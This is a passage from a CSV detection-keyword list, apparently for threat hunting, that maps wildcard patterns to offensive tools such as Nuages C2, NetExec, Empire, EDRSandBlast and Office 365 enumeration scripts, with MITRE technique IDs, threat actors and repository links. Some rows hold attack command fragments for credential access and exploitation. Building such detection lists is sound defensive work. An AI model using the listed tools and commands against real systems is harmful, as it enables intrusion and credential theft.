- Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ntlmrelayx.py.log*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*ntlmscan.py*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*ntlmscan-master.zip*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*ntlmv1.py --ntlmv1 *::*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ntlmv1-multi --ntlmv1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NtWa1tF0rS1ngle0bj3ct Executed*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" +"*Nuages*/Implants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.clearImplants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getAutoruns*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getImplants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.getListeners*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.printImplants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages.printListeners*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuages_cli.js*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesC2Connector*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesC2Implant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesPythonImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*NuagesSharpImplant*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nuclei -t workflows/bigip-pwner-workflow.yaml*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nuclei -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nuclei-burp-plugin*","offensive_tool_keyword","Xerror","A BurpSuite plugin intended to help with nuclei template generation.","T1583 T1595 T1190","N/A","N/A","N/A","Network Exploitation tools","https://github.com/projectdiscovery/nuclei-burp-plugin","1","1","N/A","N/A","10","955","102","2023-09-15T10:49:09Z","2022-01-17T10:31:33Z" +"*Nuke_Privileges /Process:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*NUL0x4C/APCLdr*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" +"*NUL0x4C/AtomLdr*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1860","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" +"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc*nxcdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxcdb-zipapp-*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nyxgeek*","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nyxgeek/lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*nyxgeek/ntlmscan*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" +"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*o_getprivs*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*o365-Attack-Toolkit*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*o365creeper.git*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" +"*o365creeper.py*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" +"*o365creeper-master*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" +"*o365enum.py*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*o365enum-master*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","1","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" +"*o365recon*","offensive_tool_keyword","o365recon","script to retrieve information via O365 with a valid cred","T1087 - T1074 - T1003 - T1002 - T1552","TA0003 - TA0011 - TA0006","N/A","N/A","Information Gathering","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon.git*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon.ps1*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*o365recon-master*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" +"*oab-parse.py*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*oaburl.py */*:*@* -e *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*Obfuscate.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*obfuscate/shellter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*obfuscate_command*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*obfuscated_module_source/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 